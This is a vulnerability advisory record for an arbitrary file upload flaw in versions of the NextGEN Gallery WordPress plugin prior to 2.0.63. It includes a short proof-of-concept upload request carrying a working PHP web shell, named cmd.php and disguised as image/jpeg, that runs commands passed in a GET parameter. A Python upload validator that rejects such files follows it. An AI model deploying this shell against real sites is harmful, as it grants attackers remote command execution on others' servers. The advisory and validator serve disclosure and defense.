Vendor: NextGEN Gallery
By: SecurityFocus
CVSS: 9.3 (HIGH)
Vulnerability Type: Arbitrary File Upload
CWE: 434
Product Name: NextGEN Gallery
Affected Version From: Prior to 2.0.63
Affected Version To: 2.0.63
Patch Exists: YES
Related CWE: N/A
CPE: a:photocrati:nextgen_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2014

NextGEN Gallery Plugin Arbitrary File Upload Vulnerability

The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Mitigation:

Upgrade to version 2.0.63 or later.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/68414/info

Versions prior to NextGEN Gallery 2.0.63 are vulnerable. 

cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>
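The PoC above names the uploaded part cmd.php while declaring Content-Type: image/jpeg, so a handler that trusts either the client's MIME type or the last extension alone lets it through. As an added example, not part of the advisory or of the plugin's own code, the following Python check parses one multipart/form-data part and accepts it only when every dotted suffix of the filename is an image extension and the body carries that format's magic bytes. The build_part, parse_part and check_upload helpers and the sample parts are constructed for this illustration.

```python
import re

# Constructed sample values (not from the advisory); the boundary string mirrors the PoC's.
BOUNDARY = b"-----------------------------2427186578189"
JPEG_MAGIC = b"\xff\xd8\xff"
MAGIC = {"jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC, "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

def build_part(filename: str, content_type: str, body: bytes) -> bytes:
    """Assemble one multipart/form-data part the way a browser would (constructed helper)."""
    hdrs = (f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    return BOUNDARY + b"\r\n" + hdrs + body + b"\r\n" + BOUNDARY + b"--\r\n"

def parse_part(raw: bytes) -> tuple[dict, bytes]:
    """Split a single part into lower-cased headers and its body bytes."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # line 0 is the boundary itself
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    body = rest.split(b"\r\n" + BOUNDARY, 1)[0]   # drop the closing boundary
    return headers, body

def check_upload(raw: bytes) -> tuple[bool, str]:
    """Accept a part only if both its name and its content prove it is an image."""
    headers, body = parse_part(raw)
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    if not m or not m.group(1):
        return False, "missing filename"
    filename = m.group(1)
    exts = filename.lower().split(".")[1:]
    # Every suffix must be an image extension: this rejects cmd.php and also
    # cmd.php.jpg, which some Apache mod_mime configurations still hand to PHP.
    if not exts or any(e not in MAGIC for e in exts):
        return False, f"extension not allowed: {filename}"
    # The client-supplied Content-Type (image/jpeg in the PoC) proves nothing;
    # check the file's own leading bytes against the claimed format instead.
    if not body.startswith(MAGIC[exts[-1]]):
        return False, f"body is not a valid .{exts[-1]} file"
    return True, "ok"

POC_LIKE = build_part("cmd.php", "image/jpeg", b"<?php /* constructed placeholder */ ?>")
BENIGN = build_part("photo.jpg", "image/jpeg", JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00")
DOUBLE_EXT = build_part("cmd.php.jpg", "image/jpeg", JPEG_MAGIC + b"\xe0")

if __name__ == "__main__":
    for label, part in [("poc", POC_LIKE), ("benign", BENIGN), ("double", DOUBLE_EXT)]:
        print(label, check_upload(part))
```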